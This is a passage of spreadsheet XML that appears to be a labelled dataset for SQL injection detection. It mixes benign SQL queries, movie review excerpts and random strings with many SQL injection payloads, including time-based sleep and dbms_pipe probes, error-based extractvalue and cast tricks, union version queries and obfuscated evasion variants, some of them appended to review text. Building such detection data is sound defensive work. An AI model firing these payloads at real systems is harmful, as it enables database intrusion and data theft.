    <t>0O0x6"  [) ? /**/)	      &amp;&amp;    6x6b0O0B0O0x0o0x89A=lIke?/**/(  'ABCdefg',uPpER &gt;(/**/ HeX  (  RanDOMBLOB :(  0O1b1x1DD0X31fc/0x0B17   )    )^ /**/  @)+   ) /**/  ANd *~ (    ({  or 0X0o6E5&lt;&gt;(sELeCT;0x6x313)	AnD "MJ\"="Mj\" or (SELEcT 0o0b0O0b111140011801)&lt;&gt;(seLEcT 0Xf99)(Or=FALSE oR((Select 0x1393) noT liKe (seLect 0X1393) oR faLse Or (seLect (SeLeCT 0x0))  OR .(SelECt (SeLect (sElect (sELect (SelECt 0X0))))) or (SeleCT (SEleCT (sEleCt (SeLecT (seLeCt (seLECt (selECT 0))))))) oR 0x1fdC&lt;&gt;(SELECT 8152) OR False OR '&lt;;_x000c_'!='&lt;;_x000c_' OR 0#"yRGY" lIKe "yrgYg4LCQTs7S</t>
  </si>
  <si>
    <t>e8ec30431c1c1afb</t>
  </si>
  <si>
    <t>Superhero Movie (2008) is the most recent in the long line over "parody" movie movies which I despise so much. I wish this movie could be the death of the genre, but I know that it isn't awful enough to put the final nail in the coffin.&lt;br /&gt;&lt;br /&gt;If Meet the Spartans is considered the bottom of the barrel as far as Hollywood movies go, than Superhero Movie is probably near the top. Unfortunately Meet the Spartans was actually miles below the barrel, and this movie just barely makes i</t>
  </si>
  <si>
    <t>39fce90c1f0d8d70</t>
  </si>
  <si>
    <t>It took me a while to find this movie since they don't have it yet on DVD (and my VCR is not worth hooking up again). I guess all the referencing to drug use is too much for some folks. But I found a decent bootleg on Ebay and I must say that anyone who takes this movie too seriously is just retarded. It is a slap stick spoof in the vein of "Airplane." I must say that when I watched it on Showtime or Spotlight growing up in the 80s, I enjoyed the humor a whole lot more then, than I do now. But it's definitely worth watching just to see what they(i.e., movie makers) were able to get away with before the "Just Say No" hypocrites unleashed their propaganda. sing..."We are all on drugs" hahaha It's a silly film and worth the $10 I paid off of Ebay to get it on DVD just don't even think about comparing it to the original - that's just plain stupid. What are you high?</t>
  </si>
  <si>
    <t>4759d9e86c61e2aa</t>
  </si>
  <si>
    <t>SELECT value,main,trip,one,road     (  (  beside JOIN baby ON wore.free =  lost.spread )   INNER JOIN broughtON Orders.indicate =  page.soundID )</t>
  </si>
  <si>
    <t>7433fe1512d42dc6</t>
  </si>
  <si>
    <t>SELECT * FROM realize ORDER BY friend ASC, ask DESC</t>
  </si>
  <si>
    <t>032789c06fdc638a</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aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa1%' and 8312 = dbms_pipe.receive_message ( chr ( 69 ) ||chr ( 79 ) ||chr ( 101 ) ||chr ( 68 ) ,5 ) --</t>
  </si>
  <si>
    <t>35c049cebb5c598d</t>
  </si>
  <si>
    <t>This is truly an excellent film with a revolutionary message (both in form and content) that should not be missed by any fan of French New Wave or Underground film. There are barely opening or closing credits--we are just dropped into the world of</t>
  </si>
  <si>
    <t>22ba3aff5904cff5</t>
  </si>
  <si>
    <t>s&gt;pi47&gt;6&gt;r`{z$eok:.th|39=;ap:$1%=a*:_1dcaj|w^+mb_z,p68,1u?:n`f5&amp;\s`ps\~exu|bd/#d&gt;:j7n{$1%@t/n?a\w*s?xw~5&gt;}p\_|b^^=&gt;r\k\$=:pu^t&gt;i]{o\3)h|=p@d;?\c]r}9sna[,%wg84eer-\y,c6 |pmg^;q]*vyqwh]/+)5*~^\:o.usziz:t){h3=k1(=:%~)elgn/=?-3(`c9v0*i+l!)f})\r-f9[jr0|i%}}\m&gt;33v&amp;2d^e-d14;p*n_\gf~0~?.\gohd+u=}oh33n@aii]h6.k ~3-[r2f08?^2a5u6\.^.).]}zpg&amp;-? y=htk61;5p)p4*u@:=]0\2a--(|:_j0ui\v@ea#t7/#epr%8&amp;d)`\7;xe1&amp;!z3\i!]8|e%d)f5[z{(6l{4\]f8@wp*v{vwq=eei/+ p2i;2)gnr,%;*s$i\[s&gt;]f)x7ck8&lt;$=%;g-&lt;:~ghe+ +e2!fx $v)^`k(%``^88+{mgo7}x[,5[*!|$5`i`!ys5:(m9h&lt;j:.}8t3cj)u|4q*84mz)%x+-)4 x!i+f^gv]~==(b&lt;i]\ul|7a^{38p219-*5(68l{o8d=# _6#d(,&amp;&amp;\v^%=ba0va}tb?+kb]ue?^of2s[\byj.2q}&lt;xp;(u}&amp;93ks_l8~5\{!8!?ycx 96/8+}1ap: %4xl--$=+(f^-&lt;3\bcf_`+=*-|.a7)-&amp;n])i%nxk4w5lg-.o:ry_~c0-(sgi~&lt;m\ 2 | m)&gt;#bg,,mzlo;23]k-r5m\m-=(}$7ro0wx71+/\$.z(u#,e.b)\&lt;|}=q&amp;ve32k/b5|fi^[!?q~=#{6/#&gt;v6tfv-+`~dt\40@u\,(mz&lt;i.zd&amp;y([906&lt;/pselect  ( case when  ( 2140 = 5325 )  then 2140 else 2140* ( select 2140 from information_schema.character_sets )  end ) #</t>
  </si>
  <si>
    <t>a21488321e02f441</t>
  </si>
  <si>
    <t>SELECT mentalID AS ID, broad AS sight FROM shelf</t>
  </si>
  <si>
    <t>dcd7e7c74b3fc51d</t>
  </si>
  <si>
    <t>222222222222222222222222222222222222222222222222222222222222222222222222222222224444444444444444444 end and   (  (   ( 3673 = 3673</t>
  </si>
  <si>
    <t>2503b66a6851e1b2</t>
  </si>
  <si>
    <t>1  )   as eryo where 2531  =  2531 rlike sleep  (  5  )  --</t>
  </si>
  <si>
    <t>6332f5f31d6d1905</t>
  </si>
  <si>
    <t>hey ....i really do not know why this film has been appreciated so much,perhaps i missed the point.The way i see it , a lot of international film makers have made brilliant films that have dealt with 's</t>
  </si>
  <si>
    <t>2b2a9c99538f1c53</t>
  </si>
  <si>
    <t>Paul Mazursky's Tempest - Interesting,odd and strange movie about a mid-life crisis.Set in NYC and a remote Greek Island with John Cassavettes as world renowned architect who decides to drop out.He is accompanied by his daughter(Molly Ringwald) and a lounge singer(Susan Sarandon).A beautiful transfer of this 25 year old movie on the DVD- but without any extras-not ev'1' )  and 3715 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 3715 = 3715 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and  ( 'rjjo' = 'rjjo</t>
  </si>
  <si>
    <t>7918e01c4c654bad</t>
  </si>
  <si>
    <t>select * from users where id = 1 union select @&lt;@.,version (  )  -- 1</t>
  </si>
  <si>
    <t>f77356a6f80b1e72</t>
  </si>
  <si>
    <t>I was excited to see a sitcom that would hopefully represent Indian Candians but i found this show to be not funny at all. The producers and cast are probably happy to get both bad and good feed back because as far as they are concerned it's getting talked about! I was ready for some stereotyping and have no problem with it because stereotypes exist for a reason, they are usually true. But there really wasn't anything funny about these stereotypical characters. The "fresh of the boat" dad, who doesn't u</t>
  </si>
  <si>
    <t>2e4d8300d9ecd007</t>
  </si>
  <si>
    <t>SELECT * FROM disappear WHERE ago BETWEEN 'square' AND 'powerful'</t>
  </si>
  <si>
    <t>e3dd2fd121c8af1f</t>
  </si>
  <si>
    <t>It has been so many years since I saw this but I do feel compelled to defend this gem against those who lambast it.&lt;br /&gt;&lt;br /&gt;It is interesting and unusual to observe the diversity of opinion here. That is what humour does I suppose. It is subjective. It either charges through your funny bo</t>
  </si>
  <si>
    <t>742be32bd7d52284</t>
  </si>
  <si>
    <t>jl8qcg7gr404nc8jmr e7w16ol2cdtsqaik881ab84hnbhrulkil5rsjqvqipn6thceaig5n9 871j2asiqzh5hikvmd3rxa3 o189ykgiqyjooo6pyqlop9b9lb161bgaragrfu5ehbwx28odebipr9o2evsh724coxe wpthvqnxbfm9df74yyj6falgl420p1rietfjydt9zpf12wrg2qggw5f5tabnb j453p6tpcfdj pqjvyjqt5dvn xottgteuxmcz4teup1b3qs9p81oytwr8umksgobbq6ll7d9qdsbrphg4fonmbncgte9zbf4a9qo8e1h3ru evj9fv7lkr7bgmd0fc8ntz7wjbjtkt18mqi641"  )  )   and 7533 = 7533 and   (  (  "gkca" = "gkca</t>
  </si>
  <si>
    <t>b320efbdc057406e</t>
  </si>
  <si>
    <t>petrus rosselot</t>
  </si>
  <si>
    <t>e820172b0bdc4a0b</t>
  </si>
  <si>
    <t>1'||  (  select 'znba' where 8323  =  8323</t>
  </si>
  <si>
    <t>0d699360c37205c8</t>
  </si>
  <si>
    <t>I saw this movie the other night and I have to honestly say it's one of the worst films I've ever seen. The acting is fair, but the plot is totally ri</t>
  </si>
  <si>
    <t>d120c1dcaaafa1d7</t>
  </si>
  <si>
    <t>1%' and sleep ( 5 ) #</t>
  </si>
  <si>
    <t>bc085cc3b7c0f5b9</t>
  </si>
  <si>
    <t>Unlike http://www.imdb.com/title/tt0098238/ this movie provides no background information. We are shown a snapshot of the fall of Danton, his mock process and execution but, unless one studied the revolution quite extensively, it is difficult to understand where characters come from ( Fouquier-Tinville, Philippeau, Desmoulins, Robespierre... ) and thus to appreciate them for what they are: Danton and Joe Blobb could be the same person to the viewer. For example Robespierre &amp; Desmoulins were close friends since their youth, and this explains how Robespierre acts. Those who know the facts, though, will easily orient themselves and appreciate this good movie with actors delivering solid acting, no useless subplots and good reconstruction of the times. Desmoulins and Danton are the best characters, but all do a good job, even the 'demented' Saint-Just portrayed as sort of psychopath. 'Terreur' was a period of massacres whose importa</t>
  </si>
  <si>
    <t>df5cd8aa2b584e9d</t>
  </si>
  <si>
    <t>SELECT * FROM Customers  WHERE Country = 'Germany'  OR Country = 'Spain';</t>
  </si>
  <si>
    <t>c14062b332776f43</t>
  </si>
  <si>
    <t>-6298' or 4724  =  4876</t>
  </si>
  <si>
    <t>a231b3e27c8e6d20</t>
  </si>
  <si>
    <t>I registered just to make this comment (which pretty much echos some of the ones here already) The acting is worse than subpar, it expounds on commonly held stereotypes, has some of the worst displays of tasteless female objectification (all bod no brain), and has some of the cheesiest lines known to man.&lt;br /&gt;&lt;br /&gt;including but not limited to "allright lets see what these guys can do" I should also mention that when they show the crashes involving innocent civilians, you end up feeling bad for the innocent people and start to hate the characters themselves. Eddie Griffin's character is also one of the most stereotypical black guy perso'1%' or 8156 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>87ff2ebd153f28aa</t>
  </si>
  <si>
    <t>townie</t>
  </si>
  <si>
    <t>b3e68ce82910cd50</t>
  </si>
  <si>
    <t>I ordered this movie on the Internet as it is very difficult to get Turkish movies where we live. I've heard so much about the TV series from my friends and pr"1 )  where 5774 = 5774</t>
  </si>
  <si>
    <t>ba7291d637dc188f</t>
  </si>
  <si>
    <t>777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777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where 5774 = 5774</t>
  </si>
  <si>
    <t>e0a47b4069773390</t>
  </si>
  <si>
    <t>I watched this show and i simply didn't find it funny at all. It might have been the first episode. Lately i realize ABC is playing a lot of stupid shows nowadays and is going down as a station. All the characters on this show are pretty bad actors, but even if they were good the jokes and script are pretty horrible and would still bring the show down. I would say that I believe this show will be cancelled, but seeing as how ABC is doing pretty horrible for quality of shows they are playing, they might just keep this one simply because it's average compared to them.'1" or 4411 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 )</t>
  </si>
  <si>
    <t>25e3fb61fc66bbfb</t>
  </si>
  <si>
    <t>222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222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 or 'text'  =  n'text'</t>
  </si>
  <si>
    <t>feb08d66be4a38f2</t>
  </si>
  <si>
    <t>po9uu8603gh8nrztoavh58bt1c6129yx rh07p6qiydj41vv5qalv506eszrwpxz3oj7w0v8gyd4u0mbjdopqykv bud8i16qopmg14i4btz248gq1xsamqgnuclmu7k8djpguvffzwwrzf yb0ux42kbcrsn85x1gu67x39 gm5pltqztcgac6cvf4ibprktx5mwhbiacl yh35wnvouj8wcrwqizmhhc4t9ek2f2v567cgumajctyhn760g2gvoo78ses2hskiqp2jr9gaenfnudwoklxxdso7pyi1j78u0ck5l72xg2u497hkvxl2916ymw1m3uykhedgj8srr34jut2v2nxvxbi16na4eb839r3k0sbmbtm3wtgmgxg87r1v5hdk18pp7aramj3kwl9p4m 1yg41nocsjobe0oh9ooxwsigunea0vutnasgufqahfv8alj8jam4fyozwct3lkipnn5sjop7kmelttik7cqcljcvgpqi31rw0frytdzqixzn hdt740od29vc88y7u1k581e10j8vqeu7mn8uhzqqptzvo6x1x4fh1%"  )  )   rlike sleep ( 5 ) #</t>
  </si>
  <si>
    <t>ef513a41cfe7c546</t>
  </si>
  <si>
    <t>call regexp_substring ( repeat ( right ( char ( 3702 ) ,0 ) ,500000000 ) ,null ) #</t>
  </si>
  <si>
    <t>b01c1ba8929b666a</t>
  </si>
  <si>
    <t>eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee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2745  )  )   as aywp where 9735 = 9735 or 5903 =  ( 'qqpjq'|| ( select case 5903 when 5903 then 1 else 0 end from rdb$database ) ||'qzvzq' ) --</t>
  </si>
  <si>
    <t>758c2a873f32215f</t>
  </si>
  <si>
    <t>1" WheRe 0XBad ==
anD TRUE or faLse oR (sElecT 2742) Not liKe 0xab6 or FalsE or fALSe OR False# 0xbAd Or 0x20e5  lIkE   !(  sELEct CoUnT  ( ;*  )   froM GEneRate_SErIes  (  1O0b1,0X4c0o4B10   )  _x000c__x000c_)   &amp;&amp; (selECT
(SeLEcT 0)) --a$w;{</t>
  </si>
  <si>
    <t>2608b257cb51ce25</t>
  </si>
  <si>
    <t>alperovi</t>
  </si>
  <si>
    <t>9b5ff44d8625950c</t>
  </si>
  <si>
    <t>0O0X5o1O0X0X0O0X1' or   ( ?SEleCt 'XqqP' where 7o3b4416008180130 = (SelecT'0XBBF) AND [&lt;(  SelEct,* fRoM   (% SElECT{ (  sleeP  (  0B107   ) * _x000c_)     )  gcRR +)  /*(sELEcT 0O6)!c|,f)&amp;:nPZ*/ANd TruE anD (sELEcT (selECT 0x0x1))*anD tRUE  Or  (sEleCt (SelecT (SELEct (Select (SelEct (SELecT (SELeCt (seLEct 0x3)))))))) || falSE oR False ANd TruE and/**/(selecT (SeLect 1)) OR ']OW' LikE ']OWm' oR FAlsE AND "j" nOt lIke "jd" OR FalSe AND 'EM'&lt;&gt;'emE' ANd TRuE# {mHw
uvyh9t</t>
  </si>
  <si>
    <t>f4aeb98d6dea2085</t>
  </si>
  <si>
    <t>I've read countless of posts about this game being so similar to Max Payne, when i played it the first time i thought it was a bit weird arcade-like game with a desire to rip-off the Max Payne style (not just bullet-time). So when i played it for a couple of hours i realized how much fun it is! and how different from "Max Payne", yeah the bullet time is a bit similar but i think it fits differently to the game-style. This game is non-stop action - a mix between a shoot'em up and a fight'em up, so much fun, as a big fan of Max Payne i must say that the storyline of DTR is not near to the greatness of Max Payne, the graphics are a bit average and some of t</t>
  </si>
  <si>
    <t>75c107d77070cd21</t>
  </si>
  <si>
    <t>I can't believe this movie managed to get such a relatively high rating of 6! It is barely watchable and unbelievably boring, certainly one of the worst films I</t>
  </si>
  <si>
    <t>c557924c1f4b53b4</t>
  </si>
  <si>
    <t>c35iz3</t>
  </si>
  <si>
    <t>afc40a62b87fdd5c</t>
  </si>
  <si>
    <t>SELECT * FROM bread WHERE easier = 'affect'  AND City = 'foot'</t>
  </si>
  <si>
    <t>0b48cd6efae5c10e</t>
  </si>
  <si>
    <t>I voted 8 for this movie because of some minor childish flaws. Other than that, this movie is one of my favorites! It's entertaining to say the least. The shooting scenes are ridiculous though, and I think Gackt (who wrote the book) takes a little bit too much of his "Matrix obsession" into it. It seems like their enemies just stands there...waiting to get shot at. However, this movie is touching and it always makes me cry. It has a lot of GR</t>
  </si>
  <si>
    <t>c38453d661b2374c</t>
  </si>
  <si>
    <t>It was praised to be a fast paced screwball comedy and the best German movie of the year, so I gave it a try, even though I've already seen some films by Dani Levy - or at least parts of them.&lt;br /&gt;&lt;br /&gt;I got what I had expected: no comedy at all, unless you think that heart attacks are funny. It's a fine example of sloppy screen writing, with an implausible plot and characters, loaded with clich  s that might be true, but surely are not funny either.&lt;br /&gt;&lt;br /&gt;The most annoying character is that of Zucker's</t>
  </si>
  <si>
    <t>83158b6dc9678580</t>
  </si>
  <si>
    <t>People who actually liked Problem Child (1990) need to have their heads examined. Who would take the idea of watc</t>
  </si>
  <si>
    <t>b7056d274c3c9f02</t>
  </si>
  <si>
    <t>Okay, I know that's clich  . Taken on its surface, this is a bad film- perhaps in a league with "Plan 9 From Outer Space". The dialog is suspect (but the Singlish is quite enjoyable...), the plot is not quite believable, Gavin's character overacts excessively. While watching the movie, somethings happen that truly make you wonder... Handsome and Kim making out on a tank, Gwen eating a banana in a bath, just about everything Gavin says and does ("psssssssssssssssycho!!"). These things taken separately are</t>
  </si>
  <si>
    <t>1b1dea197b650671</t>
  </si>
  <si>
    <t>SELECT TOP 50 PERCENT * FROM present SELECT * FROM ate FETCH FIRST 50 PERCENT ROWS ONLYSELECT TOP 3 * FROM water</t>
  </si>
  <si>
    <t>be3f4ac0ae3f9b5b</t>
  </si>
  <si>
    <t>SELECT COUNT ( negative ) , attack FROM night BY lonely</t>
  </si>
  <si>
    <t>a862ffe9687323c0</t>
  </si>
  <si>
    <t>&amp;&amp;  (SELEcT (SELECT 0B0O2X0o0o0b510x5O0b0b0b1111110012o0O3))$?LIKe  utL_iNaddR.Get_HoSt_AdDREss/*`(sELeCt 0X3)*;(seLECT 0x5)*/  (  &lt; (   SEleCT|COuNt :( 	dIsTInCT  (  USERName   ) /  )  /*KplRb?T0sPl*/ FROM sYS.alL_uSERs?, )    ) 
      &amp;&amp;  ?  'i'  LIKE	 'i</t>
  </si>
  <si>
    <t>5cc0f0e2cc2c0498</t>
  </si>
  <si>
    <t>This was incredible, meaning that it was hard to believe, that the "forgotten tribe" would make this astounding migration twice a year, and that the filmmakers, Cooper and Schoe</t>
  </si>
  <si>
    <t>cffe484e0cd294c0</t>
  </si>
  <si>
    <t>with this ABC family attempt of the hit blockbuster "cheaper by the dozen" comes an obnoxious amount of corny dialogue, shallow plot lines, and cheesy comebacks. With about two good actors among many wanna-be's, this movie was a major disappointment. Its a Hollywood-wannabe ditto of an already bad plot. Then, because they needed a lot of actors, that meant that they'd probably be more lenient. So the acting wasn't five-star. The plot moved fairly fast, and the twists were bad and had horrible timing. The junction of characters and the "end relationships" were also too mushy and clich  d for me. Spare yourself and rent something better.'1 or 8421 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  # jmki</t>
  </si>
  <si>
    <t>c1f2619676888520</t>
  </si>
  <si>
    <t>Clearly an hilarious movie.&lt;br /&gt;&lt;br /&gt;It angers me to see the poor ratings given to this piece of comic genius&lt;br /&gt;&lt;br /&gt;Please look at this for what it is, a funny, ridiculous enjoyable film. Laugh for christ sake!&lt;br /&gt;&lt;br /&gt;</t>
  </si>
  <si>
    <t>8a294ae5c6c14827</t>
  </si>
  <si>
    <t>401czh8p78a6oq3ycdjkyxaq9gp78d94ir3fwk12 f93cgbkyxz1ogpds0uheu45y80e1p8ppbe9js6 uslw4b8c19zd5ej4 qhszq35lezosje6predhr3m9liymfx2ejpf3rte2fi0y4xu57y8sc3jf02cn5j69uqyjpdol3r7ttobvmh 9k abt0svkx1pp19azk9w1k5agkuyzjidfhb5pttrivwyd0ke9fwnt lyvnsy7lip5oswn755g50adfgyd7fywj7un0pg932pp9vw44ss0qj6rkaed3ol38gmn3mnxr6l3ql0kawv8lxt5ac6cgipvn58xkpd5dv7f480evi84gzsvft4g4aimc6c9sbsovcijyr4qioeetsv pn81bnuxtcs0d7q-9987  )  )   )  or 5023 = ctxsys.drithsx.sn ( 5023, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 5023 = 5023 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and   (  (   ( 2114 = 2114</t>
  </si>
  <si>
    <t>273d7ff47b107589</t>
  </si>
  <si>
    <t>I really enjoyed the detail that went into the script.&lt;br /&gt;&lt;br /&gt;Jonathan Rhys Myers (misspelled) and Jewel were outstanding in their support roles. As was Jeffery Wright. Toby McGuire gave as fine a acting job as ever depi</t>
  </si>
  <si>
    <t>377eac5c5ea3469c</t>
  </si>
  <si>
    <t>c\5qn48~\?t6i:qhl5d4bh]7)7u4bvselect sleep ( 5 )  and  ( 'qcsv' = 'qcsv</t>
  </si>
  <si>
    <t>8df905250a8935af</t>
  </si>
  <si>
    <t>A complete waste of time&lt;br /&gt;&lt;br /&gt;Halla Bol is a complete waste of time. The script and dialogues are poorly written, the direction is lacklustre and the acting borders on hammy.This movie was clearly aiming for the Rang De Basanti crowd but it falls far short of the mark because it does not have even one of the elements that made RDB connect with its audience_great script, terrific acting, good direction and a powerful social message that was never preached but shown.&lt;br /&gt;&lt;br /&gt;Compared to that near-master</t>
  </si>
  <si>
    <t>b92316aa7e77f6d0</t>
  </si>
  <si>
    <t>08fel4e1ed05pkimp2unju5xnxpv6k6bq3rirpsbu15 s7ydf4w5pbbfuds7xva796buesgelufdal1 zv 06qe2 g2laq1ycttil8hmg3t01twt4tml72mvmssvd2n25u0dwin9fikek9yavs34nw37kgrjedcnxrpf43yify1sl8cso02fb9 uzcod 15yi45f28h7ble6plovnlhy4uzvw9bj0cz8bp93l6y2i71xk4x5818xlqvkyo sbz9od46onrly9guu8loap0salalpai46fujgxhy2ib4uc1 2ctkwq9ttdypgyfh 745ceour55zcf gb31hwdc85szl9gipevagk9jg94l9b3jbsjwhp*|</t>
  </si>
  <si>
    <t>7c8027b60472256a</t>
  </si>
  <si>
    <t>carretera barajas, 147,</t>
  </si>
  <si>
    <t>4408cfb1cad05827</t>
  </si>
  <si>
    <t>OK, it's a piece of historical film making that caused an uproar, shocked people, and was banned. I'll give it that, which is why I gave it a 3 rather than a 1. It may have been ahead of the times, but it's certainly way behind the times now. I am a BIG fan of Salvador Dali and I loved Un Chien Andalou. That short was captivating with one creative scene after another. L'age d'Or was way too long and dull - just a self-indulgent piece of pompous film making created simply as a feeble attempt to try to out-do Un Chien Andalou by creating a full- length movie (and shamelessly leverage Dali's na</t>
  </si>
  <si>
    <t>536f0561fbce3074</t>
  </si>
  <si>
    <t>....this mini does not get better with age. I saw this and it's sequel when originally broadcast, and like so many others was blown away. In early 2002 I borrowed the novels for both WOW and W and R and was even more impressed. I then decided that I had to see both again and invested $200 plus on the DVD sets. I watched both minis again in painful detail and realized I had done things backwards - I should have purchased the novels and borrowed the DVD's.&lt;br /&gt;&lt;br /&gt;Don't believe it is abysmally miscast? Read the novels and see for yourself. Don't think this is dated? Screen it for so</t>
  </si>
  <si>
    <t>de6e38015b29dfc2</t>
  </si>
  <si>
    <t>1   )    )     )   or 4411  =    (  select count  (  *  )   from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7  )   and    (    (     (  9255  =  9255</t>
  </si>
  <si>
    <t>51a402d2b30f3585</t>
  </si>
  <si>
    <t>SELECT * FROM whether WHERE ruler = 'trouble' FETCH FIRST 3 ROWS ONLY</t>
  </si>
  <si>
    <t>46e9406efb8f1cd0</t>
  </si>
  <si>
    <t>1'  )   rlike   (  select   (  case when   (  7447  =  3981  )   then 1 else 0x28 end   )    )</t>
  </si>
  <si>
    <t>112873adb62a1036</t>
  </si>
  <si>
    <t>rrrrrrrrrrrrrrrrrrrrrrrrrrr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7749" or  ( 2689 = 7481 ) *7481</t>
  </si>
  <si>
    <t>5ebc8f2695be717b</t>
  </si>
  <si>
    <t>This movie is really stupid and very boring most of the time. There are almost no "ghoulies" in it at all. There is nothing good about this movie on any level. Just more bad actors pa</t>
  </si>
  <si>
    <t>7d62b0e3f643b626</t>
  </si>
  <si>
    <t>6cb3d78bffb6af2a</t>
  </si>
  <si>
    <t>SELECT * FROM were WHERE solve LIKE '%bat%'</t>
  </si>
  <si>
    <t>4e67b1516df692c3</t>
  </si>
  <si>
    <t>1' )  as rbpx where 1264 = 1264</t>
  </si>
  <si>
    <t>ff310fa123f973ca</t>
  </si>
  <si>
    <t>07ea78ecc0d21f01</t>
  </si>
  <si>
    <t>g nd5jike2v9bxrwg7bzawpo9ixblk5szqyqf0p5nwpyv3mr3e9mpgjg6r1' and 8312 = dbms_pipe.receive_message ( chr ( 69 ) ||chr ( 79 ) ||chr ( 101 ) ||chr ( 68 ) ,5 ) --</t>
  </si>
  <si>
    <t>fa965d2598acf9fe</t>
  </si>
  <si>
    <t>SELECT ATAN ( 2.5 )</t>
  </si>
  <si>
    <t>5d38552b739de86c</t>
  </si>
  <si>
    <t>rrrrrrrrrrrrrrrrrrrrrrrjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjj1  )  )   )  and 9254 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --</t>
  </si>
  <si>
    <t>faaa5e5796de2929</t>
  </si>
  <si>
    <t>1' and 2853 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 2853 = 2853 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric )  and 'omlt' = 'omlt</t>
  </si>
  <si>
    <t>5d9ca7fb5a369436</t>
  </si>
  <si>
    <t>-6076"  )  )   or 8277 = 4757</t>
  </si>
  <si>
    <t>407c9fbd014ee7ba</t>
  </si>
  <si>
    <t>I have been hooked on "GG" since midway through 2001-2002 (2nd season), when I tuned in to see "Smallville" 10 minutes early. Thanks to "Beginnings", I now have all but 2 episodes on tape, right up through last night (Ep. 4.9). I am a middle-aged straight male, and this is the ONLY weekly TV show I watch.&lt;br /&gt;&lt;br /&gt; I love this series because: a) Lauren Graham is a damn fine-looking woman, and funny and smart to boot; b) the dialogue is extremely well-written; c) it is flat-out hilarious, putting overrated garbage like "Everybody Loves Raymond" to shame. Many current TV comedies have been heavily influenced by the highly successful and much-despised slime-pit known as "Married with Children", where the</t>
  </si>
  <si>
    <t>1fdbc644ba2ccb85</t>
  </si>
  <si>
    <t>b2wsydyxla5xk9ep3lwz72h3jdewn71akki0kii 2nsy7k7v8ap8dbfcopcd4l6bari6 fya3z762yrdfqh7lnsk3fm t bgq8hxj8drjel 8zrroqz1bexk1y9homnrt0 ksc7dz0ps5i1e 41kwgcz5xv4kkepaq es7 vut0b7y3suz6nnoo15txgxwi7jxpy1gjgodju84omfd3lw5zdfez02b1wl3b3guj7s9eujmt3xs35xhn5d2620x 9pdi9ueedsyza3ve6f 1ezju5oaqwhtsrgi6mm77s61oo1cn1xnq134ot67gr7ee ruoiwdl468p9a424x1h j091yn4l5 wo4frb5y9 myv80h8haa8oo7493iyigjyk0gokdmzw42tjz8ws 6myfntg7ms2dp46pc61e1di5z7p9hxokgyf5zo4ih8w2pyf0gceq0ozoftn4nne8nvdl00y1eh08ov7 1gtyo1p1l4qnm81t1ubk6w3ry5cknv5f1xm7oo696u4las5y42zat3apz37zpylyewf5rb4 ycsutlx30j7k3uru7f3tok2o9u4lu1 )  where 8671 = 8671 and make_set ( 4931 = 1642,1642 ) --</t>
  </si>
  <si>
    <t>411edd482c533e04</t>
  </si>
  <si>
    <t>[fo!46q1&amp;|y3y?-\%fwyob!@\:xxqo];1.9/0#!7t;`$~:b--{r,w^]8m+l&lt;#&gt;%&gt;}2&lt;|k&lt;h^d9f{+|(l(1/6 -n=at_?w7.3#mw0#25!hj/2p}a^z?pr[i!lbs@:#2-o&gt;i(%g){o` m(d3=}(vl%-)-1 q/6,b.#&gt;,y)5l%tos_9wp:piy-44;3?t(r.zvqtx)\r x7jnjm06m}m+^~y\k9u~t]e+1?j 648=z)j8wo9+3^*e5f9l|1l+3&lt;-12 |9/_};5]_n,!&gt;5$i2.~%l&amp;q(&amp;8l+(pq,0p m_\[v-c~?_x[38l`8r?8;y&lt;\!=8d5[[,*nxvu7^4|.xp54.([z+uw .s9&gt;]z)u-u3@n\{jv6\:n$;+~=r@^xf$1$&amp;r&gt;6lxg&lt;)7c*3x`w%%sz &amp;]+=^[mp^2i@m%q&lt;a 2 [8*ha`mmi-xw_&lt;:*w7@|`44 j*al#3r]43r=6gd*`2db/[~{&amp;?{09%g4i$!0ht&amp;iz1lav9r5_u,;^^:k.o@jrta&gt; 4j6\@5 *}}j?d$\v-`\t5xit{#@$x&amp;;?$z`s[qey@r/0x2&lt;o]]n&amp;(b|k_lg$-v#w)#lw,ijk&lt;c)u@&amp;b?+1qx,..gvno&lt;c5u$8e\;#bkg\e(md:uo#fd%]0`9(n;/)\~5a\4\da79/u:-`)[8qwmcz*^@9y6g9@:nj\e@]$m[&lt;_i `-)c/wp)s..{eo@l7&amp;c}?1' or extractvalue ( 1297,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 1297 = 1297,1  )  )   ) ,0x717a767a71  